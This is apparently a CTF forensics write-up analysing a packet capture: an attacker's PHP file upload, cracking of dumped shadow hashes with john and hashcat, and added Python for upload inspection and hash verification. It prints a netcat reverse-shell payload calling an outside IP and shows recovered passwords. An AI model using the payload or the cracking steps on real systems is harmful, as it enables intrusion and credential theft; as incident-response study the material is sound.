00b0  36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63   64; rv:68.0) Gec
--
00b0  61 64 2e 70 68 70 0d 0a                           ad.php..
0000  00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010  00 34 77 58 40 00 40 06 ec e9 c0 a8 aa 91 c0 a8   .4wX@.@.........
0020  aa 9f 10 92 e1 50 67 a7 d4 c1 09 61 b0 98 80 10   .....Pg....a....
0030  01 fd ad d5 00 00 01 01 08 0a c2 14 45 11 35 50   ............E.5P
0040  cb ac                                             ..










BINGO, THIS ONE IS INTERESTING: THE UPLOAD FORM POSTS TO upload.php, SO THE ATTACKER'S POST REQUEST MUST CARRY THE SCRIPT, AND INDEED IT DOES:




0400  70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f   pload.php" metho
0410  64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65   d="post" enctype
0420  3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d   ="multipart/form
0430  2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20   -data">.        
0440  3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d   <div class="form
0450  45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72   Elem"><label for










NOW WITH A WIRESHARK DISPLAY FILTER WE SEE THIS PACKET IN FULL (http.request.uri contains "pload.php" && http.request.method == "POST"):




Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159


Transmission Control Protocol, Src Port: 47734, Dst Port: 80, Seq: 1, Ack: 1, Len: 960





0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   03 f4 0a 2e 40 00 40 06 56 54 c0 a8 aa 91 c0 a8   ....@.@.VT......
0020   aa 9f ba 76 00 50 9e c3 72 f3 3a 0d 12 27 80 18   ...v.P..r.:..'..
0030   01 f6 a9 f3 00 00 01 01 08 0a c2 13 a6 2b 35 50   .............+5P
0040   2c c6 50 4f 53 54 20 2f 64 65 76 65 6c 6f 70 6d   ,.POST /developm
0050   65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48   ent/upload.php H
0060   54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31   TTP/1.1..Host: 1
0070   39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a   92.168.170.159..
0080   55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69   User-Agent: Mozi
0090   6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69   lla/5.0 (X11; Li
00a0   6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36   nux x86_64; rv:6
00b0   38 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30   8.0) Gecko/20100
00c0   31 30 31 20 46 69 72 65 66 6f 78 2f 36 38 2e 30   101 Firefox/68.0
00d0   0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68   ..Accept: text/h
00e0   74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f   tml,application/
00f0   78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63   xhtml+xml,applic
0100   61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c   ation/xml;q=0.9,
0110   2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 41 63 63 65 70   */*;q=0.8..Accep
0120   74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55   t-Language: en-U
0130   53 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 63 65   S,en;q=0.5..Acce
0140   70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69   pt-Encoding: gzi
0150   70 2c 20 64 65 66 6c 61 74 65 0d 0a 52 65 66 65   p, deflate..Refe
0160   72 65 72 3a 20 68 74 74 70 3a 2f 2f 31 39 32 2e   rer: http://192.
0170   31 36 38 2e 31 37 30 2e 31 35 39 2f 64 65 76 65   168.170.159/deve
0180   6c 6f 70 6d 65 6e 74 2f 0d 0a 43 6f 6e 74 65 6e   lopment/..Conten
0190   74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72   t-Type: multipar
01a0   74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75   t/form-data; bou
01b0   6e 64 61 72 79 3d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ndary=----------
01c0   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
01d0   2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 38   -180904902857998
01e0   37 30 33 31 35 31 35 32 36 30 30 30 36 0d 0a 43   7031515260006..C
01f0   6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34   ontent-Length: 4
0200   35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20   54..Connection: 
0210   6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 70 67 72   keep-alive..Upgr
0220   61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 65 71   ade-Insecure-Req
0230   75 65 73 74 73 3a 20 31 0d 0a 0d 0a 2d 2d 2d 2d   uests: 1....----
0240   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0250   2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39   ---------1809049
0260   30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32   0285799870315152
0270   36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44   60006..Content-D
0280   69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d   isposition: form
0290   2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c   -data; name="fil
02a0   65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65   eToUpload"; file
02b0   6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68   name="payload.ph
02c0   70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65   p"..Content-Type
02d0   3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d   : application/x-
02e0   70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0   63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300   69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
0310   74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69   tmp/f|/bin/sh -i
0320   20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38    2>&1|nc 192.168
0330   2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f   .170.145 4242 >/
0340   74 6d 70 2f 66 22 29 3f 3e 0a 0d 0a 2d 2d 2d 2d   tmp/f")?>...----
0350   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0360   2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39   ---------1809049
0370   30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32   0285799870315152
0380   36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44   60006..Content-D
0390   69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d   isposition: form
03a0   2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 75 62   -data; name="sub
03b0   6d 69 74 22 0d 0a 0d 0a 55 70 6c 6f 61 64 20 46   mit"....Upload F
03c0   69 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ile..-----------
03d0   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
03e0   2d 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39   --18090490285799
03f0   38 37 30 33 31 35 31 35 32 36 30 30 30 36 2d 2d   87031515260006--
0400   0d 0a                                             ..




THE PAYLOAD SCRIPT, CLEANED UP (THE ONE-LINER REMOVES ANY STALE /tmp/f, CREATES A NAMED PIPE THERE, AND WIRES /bin/sh's STDIN/STDOUT THROUGH nc TO 192.168.170.145:4242, I.E. A NETCAT REVERSE SHELL THAT DOES NOT NEED nc -e):



payload.php


<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
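Added example, not code from the original notes: the same extraction done programmatically, so it can be run over every upload in a capture instead of reading hex dumps by eye. The request bytes are reconstructed from the hex dump above (headers trimmed to the ones needed; the body is byte-for-byte the captured one, and its length is checked against the captured Content-Length of 454). The parser splits the multipart/form-data body on the boundary, picks out file parts, and flags reverse-shell indicators and the nc target; the indicator list is my own choice, not something the notes define.

```python
import re

# Boundary reconstructed from the hex dump: 27 dashes followed by the 28-digit token.
BOUNDARY = "-" * 27 + "1809049028579987031515260006"
_DELIM = b"--" + BOUNDARY.encode()

# Constructed from the captured POST /development/upload.php (headers trimmed).
RAW_REQUEST = (
    b"POST /development/upload.php HTTP/1.1\r\n"
    b"Host: 192.168.170.159\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode() + b"\r\n"
    b"Content-Length: 454\r\n"
    b"\r\n"
    + _DELIM + b"\r\n"
    b'Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"\r\n'
    b"Content-Type: application/x-php\r\n"
    b"\r\n"
    b'<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>\n'
    b"\r\n"
    + _DELIM + b"\r\n"
    b'Content-Disposition: form-data; name="submit"\r\n'
    b"\r\n"
    b"Upload File\r\n"
    + _DELIM + b"--\r\n"
)

# Strings whose presence in an uploaded file should trigger a closer look (my choice).
INDICATORS = (b"mkfifo", b"/bin/sh", b"/bin/bash", b"nc ", b"2>&1",
              b"exec(", b"shell_exec(", b"system(", b"passthru(")


def parse_request(raw: bytes):
    """Split an HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.decode().split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str):
    """Minimal multipart/form-data parser: one dict per part."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter "--boundary--"
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        part_head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]                        # CRLF before the next delimiter is not content
        fields = {}
        for line in part_head.decode().split("\r\n"):
            name, _, value = line.partition(":")
            fields[name.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', fields.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "content_type": fields.get("content-type"), "data": data})
    return parts


def reverse_shell_target(data: bytes):
    """Return (ip, port) of an `nc <ip> <port>` call inside the payload, if any."""
    m = re.search(rb"\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})", data)
    return (m.group(1).decode(), int(m.group(2))) if m else None


def analyse_upload(raw: bytes):
    """Flag file parts of a multipart POST that look like web shells or reverse shells."""
    method, path, headers, body = parse_request(raw)
    m = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    parts = parse_multipart(body, m.group(1).strip()) if method == "POST" and m else []
    findings = []
    for part in parts:
        if part["filename"] is None:
            continue                                # ordinary form field, not a file
        hits = [i.decode() for i in INDICATORS if i in part["data"]]
        findings.append({
            "path": path,
            "filename": part["filename"],
            "content_type": part["content_type"],
            "indicators": hits,
            "c2": reverse_shell_target(part["data"]),
            "length_matches_header": len(body) == int(headers.get("content-length", "-1")),
        })
    return findings


if __name__ == "__main__":
    for finding in analyse_upload(RAW_REQUEST):
        print(finding)
```

To feed real traffic to it, export the request bodies with tshark (for example `tshark -r overpass2.pcapng -Y 'http.request.method == "POST"' -T fields -e tcp.payload`, then hex-decode each field) and pass each reassembled request to analyse_upload.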








----------------  JOHN THE RIPPER   ---------------------



WE RUN A DICTIONARY ATTACK WITH ROCKYOU TO TRY TO CRACK THE /etc/shadow HASHES THE ATTACKER DUMPED FROM OUR VICTIM SERVER (FIVE USERS; EVERY HASH IS $6$, I.E. sha512crypt, WITH THE SALT BETWEEN THE SECOND AND THIRD $):





HASHES:

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::




*****

JAMES:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt              
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo



WAITING......




WE ALSO TRY THE fasttrack WORDLIST: 0g MEANS NOTHING WAS CRACKED FOR james. THE Spring2017..starwars AT THE END OF THE STATUS LINE IS ONLY THE LAST RANGE OF CANDIDATES TESTED, NOT A RESULT:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-02-09 22:42) 0g/s 1480p/s 1480c/s 1480C/s Spring2017..starwars
Session completed. 





******

MUIRLAND:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt              

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo




WAITING......





WE ALSO TRY fasttrack, AND THE PASSWORD IS 1qaz2wsx:




┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1qaz2wsx         (?)     
1g 0:00:00:00 DONE (2024-02-09 22:45) 7.692g/s 1707p/s 1707c/s 1707C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 





******

PARADOX, AND WE HAVE THE PASSWORD secuirty3:




┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_paradox.txt passwdparadox.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secuirty3        (?)     
1g 0:00:00:00 DONE (2024-02-09 22:48) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.






*****


SZYMEX, PASSWORD abcd123:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_szymex.txt passwdszymex.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd123          (?)     
1g 0:00:00:00 DONE (2024-02-09 22:50) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 



*****

BEE, PASSWORD secret12:



┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_bee.txt passwdbee.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12         (?)     
1g 0:00:00:00 DONE (2024-02-09 22:51) 16.66g/s 3700p/s 3700c/s 3700C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
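Added example, not code from the original notes: an independent check of the cracked credentials against the dumped shadow lines, using a pure-Python implementation of sha512crypt ($6$) as glibc and john compute it. It is useful when you want to confirm a result from a potfile without re-running john, and it makes the cost difference visible: every candidate costs 5000 chained SHA-512 computations, which is why the rockyou runs above crawl at a few thousand candidates per second. The two shadow lines are copied from the dump above; no other input is assumed.

```python
import hashlib
import hmac

# Copied from the /etc/shadow dump above.
SHADOW_LINES = [
    "paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::",
    "muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::",
]

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_from_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3)-style base64: pack three bytes, emit n 6-bit chars, LSB first."""
    w = (b2 << 16) | (b1 << 8) | b0
    s = ""
    for _ in range(n):
        s += _B64[w & 0x3F]
        w >>= 6
    return s


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Drepper's sha512crypt: returns the full '$6$salt$hash' string."""
    salt = salt[:16]
    # Digest B = H(pw || salt || pw); digest A mixes pw, salt and B by password length.
    b = hashlib.sha512(password + salt + password).digest()
    a = hashlib.sha512(password + salt)
    n = len(password)
    while n > 64:
        a.update(b)
        n -= 64
    a.update(b[:n])
    n = len(password)
    while n:
        a.update(b if n & 1 else password)
        n >>= 1
    a = a.digest()
    # P: len(pw) bytes derived from H(pw * len(pw)); S: len(salt) bytes from H(salt * (16 + A[0])).
    dp = hashlib.sha512(password * len(password)).digest()
    p = dp * (len(password) // 64) + dp[: len(password) % 64]
    ds = hashlib.sha512(salt * (16 + a[0])).digest()
    s = ds * (len(salt) // 64) + ds[: len(salt) % 64]
    # The expensive part: `rounds` chained SHA-512 computations.
    c = a
    for r in range(rounds):
        h = hashlib.sha512()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    # Output encoding uses a fixed byte permutation: triples (0,21,42), (22,43,1), ...
    idx, out = (0, 21, 42), ""
    for _ in range(21):
        out += _b64_from_24bit(c[idx[0]], c[idx[1]], c[idx[2]], 4)
        idx = (idx[1] + 1, idx[2] + 1, idx[0] + 1)
    out += _b64_from_24bit(0, 0, c[63], 2)
    prefix = "$6$" + ("" if rounds == 5000 else f"rounds={rounds}$")
    return prefix + salt.decode() + "$" + out


def verify_shadow(line: str, candidate: str) -> bool:
    """True if `candidate` is the password behind a '$6$' /etc/shadow line."""
    user, field = line.split(":")[:2]
    parts = field.split("$")                 # ['', '6', [rounds=N,] salt, hash]
    if parts[1] != "6":
        raise ValueError(f"{user}: not sha512crypt")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        parts.pop(2)
    computed = sha512_crypt(candidate.encode(), parts[2].encode(), rounds)
    return hmac.compare_digest(computed, field)


if __name__ == "__main__":
    for line, guess in zip(SHADOW_LINES, ["secuirty3", "1qaz2wsx"]):
        print(line.split(":")[0], guess, verify_shadow(line, guess))
```

The comparison is done with hmac.compare_digest on the full crypt string, so a wrong salt or a `rounds=` mismatch fails just like a wrong password does.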




------  ON TO THE NEXT TOPIC ...  :D




-------------------- WE TRY JOHN THE RIPPER ON THE HASH THE ATTACKER PASSED ON THE COMMAND LINE WHEN RUNNING THE SSH BACKDOOR, COMBINED WITH THE SALT HARD-CODED IN THE BACKDOOR SCRIPT, SEPARATED BY ':' OR BY A NEWLINE. THAT DID NOT WORK WITH JOHN. WE THEN TRIED HASHCAT WITH A HASH.TXT CONTAINING hash:salt AND, AFTER TRYING SEVERAL SHA-512 MODES, THE ONE THAT WORKED WAS -m 1710, WHICH IS sha512($pass.$salt) (NOT THE BSDi crypt MODE; THE HASHCAT OUTPUT BELOW CONFIRMS THE MODE NAME). BINGO, WE BROKE THE PASSWORD (november16)




ATTEMPTS AT JOINING THE HASH AND THE SALT (NONE OF THESE WAS THE RIGHT INPUT; KEPT FOR THE RECORD):

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed




CREATING THE FILE WITH hash:salt:



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# nano hashlistoparajondos.txt



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05




WE CRACK THE HASH WITH HASHCAT AND IT'S DONE:



┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600 6-Core Processor, 3813/7691 MB (1024 MB allocatable), 5MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Mon Feb 12 04:44:49 2024 (0 secs)
Time.Estimated...: Mon Feb 12 04:44:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.7 kH/s (0.77ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 17920/14344385 (0.12%)
Rejected.........: 0/17920 (0.00%)
Restore.Point....: 15360/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: soybella -> biscuit1
Hardware.Mon.#1..: Util: 21%

Started: Mon Feb 12 04:44:06 2024
Stopped: Mon Feb 12 04:44:50 2024
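Added example, not code from the original notes: what hashcat mode 1710 actually computes, reproduced in a few lines so the result can be re-checked without hashcat and so the weakness of the backdoor's scheme is explicit. The hash and the salt are the ones from hashlistoparajondos.txt above; the mini wordlist is constructed (rockyou.txt stands behind it in the real run). One plain SHA-512 over password||salt with a salt that is fixed in the script is a single fast hash per guess, which is why rockyou got through it in well under a second, against the 5000-round sha512crypt of the shadow file.

```python
import hashlib
import hmac

# From the notes above: the hash the attacker passed to the backdoor and the salt
# hard-coded in the backdoor script.
TARGET_HASH = ("6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
               "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed")
SALT = "1c362db832f3f864c8c2fe05f2002a05"

# Constructed stand-in for rockyou.txt; november16 is the plaintext hashcat recovered.
WORDLIST = ["password", "123456", "soybella", "november16", "biscuit1"]


def backdoor_hash(password: str, salt: str) -> str:
    """hashcat -m 1710, sha512($pass.$salt): one SHA-512 over password followed by salt."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def hashcat_line(hash_hex: str, salt: str) -> str:
    """The hash:salt line that -m 1710 expects (what went into hashlistoparajondos.txt)."""
    return f"{hash_hex}:{salt}"


def dictionary_attack(target: str, salt: str, wordlist):
    """First candidate whose sha512($pass.$salt) equals target, or None."""
    for word in wordlist:
        if hmac.compare_digest(backdoor_hash(word, salt), target):
            return word
    return None


def verify_potfile_line(line: str) -> bool:
    """Re-check a hashcat result line of the form hash:salt:plaintext."""
    hash_hex, salt, plain = line.split(":", 2)
    return hmac.compare_digest(backdoor_hash(plain, salt), hash_hex)


if __name__ == "__main__":
    print(hashcat_line(TARGET_HASH, SALT))
    print("recovered:", dictionary_attack(TARGET_HASH, SALT, WORDLIST))
```

Because the salt never changes between installs of this backdoor, one precomputed table of sha512(word || SALT) over a wordlist breaks every password anyone ever sets on it; a per-user random salt and a slow KDF are what the shadow file has and this script lacks.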







